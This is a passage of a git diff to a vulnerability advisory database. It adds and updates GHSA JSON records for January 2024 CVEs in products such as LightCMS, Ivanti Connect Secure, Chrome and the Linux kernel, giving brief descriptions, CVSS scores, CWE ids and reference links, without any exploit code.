"type": "WEB", + "url": "https://patchstack.com/database/vulnerability/better-anchor-links/wordpress-better-anchor-links-plugin-1-7-5-csrf-to-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json b/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json new file mode 100644 index 0000000000000..8b31756e77b0b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5pp3-xch3-9qv7/GHSA-5pp3-xch3-9qv7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pp3-xch3-9qv7", + "modified": "2024-02-02T03:30:31Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-22559" + ], + "details": "LightCMS v2.0 is vulnerable to Cross Site Scripting (XSS) in the Content Management - Articles field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22559" + }, + { + "type": "WEB", + "url": "https://github.com/eddy8/LightCMS/issues/34" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json b/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json index 018d8a42e0257..791b31d3f641e 100644 --- a/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json +++ b/advisories/unreviewed/2024/01/GHSA-5prg-h6vm-wxcf/GHSA-5prg-h6vm-wxcf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5prg-h6vm-wxcf", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-38626" ], "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38625.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json b/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json index 350bbcb0548de..2c2c73e818e4c 100644 --- a/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json +++ b/advisories/unreviewed/2024/01/GHSA-5q2h-m2hm-4r3w/GHSA-5q2h-m2hm-4r3w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5q2h-m2hm-4r3w", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51886" ], "details": "Buffer Overflow vulnerability in the main() function in Mathtex 1.05 and before allows a remote attacker to cause a denial of service when using \\convertpath.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json b/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json index b5312ec3604d6..b83d9bbd52ced 100644 --- a/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json +++ b/advisories/unreviewed/2024/01/GHSA-5qv8-mq82-vgm3/GHSA-5qv8-mq82-vgm3.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20967" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2024.html" diff --git a/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json b/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json index fef7806b1e04d..bedb87e3bf834 100644 --- a/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json +++ b/advisories/unreviewed/2024/01/GHSA-5rh9-65g2-hc9h/GHSA-5rh9-65g2-hc9h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5rh9-65g2-hc9h", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-22663" ], "details": "TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T15:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json b/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json new file mode 100644 index 0000000000000..68f200aeb00b0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5rh9-jc57-95mr/GHSA-5rh9-jc57-95mr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rh9-jc57-95mr", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-21917" + ], + "details": "\nA vulnerability exists in Rockwell Automation FactoryTalk® Service Platform that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory.  If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21917" + }, + { + "type": "WEB", + "url": "https://www.rockwellautomation.com/en-us/support/advisory.SD1660.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-347" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json b/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json new file mode 100644 index 0000000000000..858006343af51 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5rr9-mqhj-7cr2/GHSA-5rr9-mqhj-7cr2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rr9-mqhj-7cr2", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-21893" + ], + "details": "A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21893" + }, + { + "type": "WEB", + "url": "https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json b/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json new file mode 100644 index 0000000000000..c7b2be950166b --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5rrq-v3j5-cwgm/GHSA-5rrq-v3j5-cwgm.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rrq-v3j5-cwgm", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T00:30:18Z", + "aliases": [ + "CVE-2024-1059" + ], + "details": "Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1059" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html" + }, + { + "type": "WEB", + "url": "https://crbug.com/1514777" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T22:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json index 0e44454fc2ca0..94ee1c3fb7040 100644 --- a/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json +++ b/advisories/unreviewed/2024/01/GHSA-5v7q-gqff-9cj8/GHSA-5v7q-gqff-9cj8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5v7q-gqff-9cj8", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2023-51042" ], "details": "In the Linux kernel before 6.4.12, amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c has a fence use-after-free.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json b/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json index 034485bb79965..e4483528911eb 100644 --- a/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json +++ b/advisories/unreviewed/2024/01/GHSA-6253-5q75-wc4w/GHSA-6253-5q75-wc4w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6253-5q75-wc4w", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-23348" ], "details": "Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json b/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json index 660e466c9d56f..4c071c72a09c9 100644 --- a/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json +++ b/advisories/unreviewed/2024/01/GHSA-627f-4vcr-fmq4/GHSA-627f-4vcr-fmq4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-627f-4vcr-fmq4", - "modified": "2024-01-22T00:30:19Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-22T00:30:19Z", "aliases": [ "CVE-2024-23744" ], "details": "An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-21T23:15:44Z" diff --git a/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json b/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json index ac2ee5379a3e1..6065929f90b25 100644 --- a/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json +++ b/advisories/unreviewed/2024/01/GHSA-63fr-hqmm-7x7r/GHSA-63fr-hqmm-7x7r.json @@ -28,6 +28,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-116", "CWE-117" ], "severity": "LOW", diff --git a/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json b/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json index c1107ee6eb2a2..e072740615142 100644 --- a/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json +++ b/advisories/unreviewed/2024/01/GHSA-63fx-c7fv-hgj5/GHSA-63fx-c7fv-hgj5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-63fx-c7fv-hgj5", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23849" ], "details": "In rds_recv_track_latency in net/rds/af_rds.c in the Linux kernel through 6.7.1, there is an off-by-one error for an RDS_MSG_RX_DGRAM_TRACE_MAX comparison, resulting in out-of-bounds access.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -18,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23849" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LBVHM4LGMFIHBN4UBESYRFMYX3WUICV5/" + }, { "type": "WEB", "url": "https://lore.kernel.org/netdev/1705715319-19199-1-git-send-email-sharath.srinivasan%40oracle.com/" @@ -29,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json b/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json index fa94cc2576f22..5b845ffa5bcd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json +++ b/advisories/unreviewed/2024/01/GHSA-663j-9vv5-mmf4/GHSA-663j-9vv5-mmf4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-663j-9vv5-mmf4", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51887" ], "details": "Command Injection vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json b/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json new file mode 100644 index 0000000000000..64f08fd3f6919 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-682j-m7jh-pj2w/GHSA-682j-m7jh-pj2w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-682j-m7jh-pj2w", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2023-50357" + ], + "details": "A cross site scripting vulnerability in the AREAL SAS Websrv1 ASP website allows a remote low-privileged attacker to gain escalated privileges of other non-admin users.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50357" + }, + { + "type": "WEB", + "url": "https://www.areal-topkapi.com/en/services/security-bulletins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json b/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json index 3fd7e41067080..3de687eaef511 100644 --- a/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json +++ b/advisories/unreviewed/2024/01/GHSA-692m-3mc5-vrjq/GHSA-692m-3mc5-vrjq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-692m-3mc5-vrjq", - "modified": "2024-01-26T00:30:30Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-26T00:30:30Z", "aliases": [ "CVE-2024-23626" diff --git a/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json b/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json index 02990d4152702..1bdd2965cc07d 100644 --- a/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json +++ b/advisories/unreviewed/2024/01/GHSA-697x-76hh-g8hq/GHSA-697x-76hh-g8hq.json @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-862" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json b/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json new file mode 100644 index 0000000000000..c5f87c9d560e0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6fjc-2q3r-pj6j/GHSA-6fjc-2q3r-pj6j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fjc-2q3r-pj6j", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-22648" + ], + "details": "A Blind SSRF vulnerability exists in the \"Crawl Meta Data\" functionality of SEO Panel version 4.10.0. This makes it possible for remote attackers to scan ports in the local environment.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22648" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22648" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json b/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json index 9221e61d1f7c2..e79a4716bd488 100644 --- a/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json +++ b/advisories/unreviewed/2024/01/GHSA-6g54-284w-pj4p/GHSA-6g54-284w-pj4p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6g54-284w-pj4p", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2024-23676" diff --git a/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json b/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json index f9cd34ca23af0..d35dd4b53eea8 100644 --- a/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json +++ b/advisories/unreviewed/2024/01/GHSA-6grj-h983-99rg/GHSA-6grj-h983-99rg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6grj-h983-99rg", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47199" ], "details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47193.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json b/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json new file mode 100644 index 0000000000000..219fa4c0a3cd3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-6j62-7qgg-9gww/GHSA-6j62-7qgg-9gww.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6j62-7qgg-9gww", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2023-40551" + ], + "details": "A flaw was found in the MZ binary format in Shim. An out-of-bounds read may occur, leading to a crash or possible exposure of sensitive data during the system's boot phase.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40551" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40551" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259918" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json b/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json index 176d34a1ea8fc..c39fa693215ce 100644 --- a/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json +++ b/advisories/unreviewed/2024/01/GHSA-6jhr-xfqr-826m/GHSA-6jhr-xfqr-826m.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6jhr-xfqr-826m", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47200" ], "details": "A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47201.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json b/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json index d6a1f11238592..433f5164a1bfb 100644 --- a/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json +++ b/advisories/unreviewed/2024/01/GHSA-6m93-gmrj-jf29/GHSA-6m93-gmrj-jf29.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6m93-gmrj-jf29", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-24399" ], "details": "An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6m95-c675-56r5/GHSA-6m95-c675-56r5.json 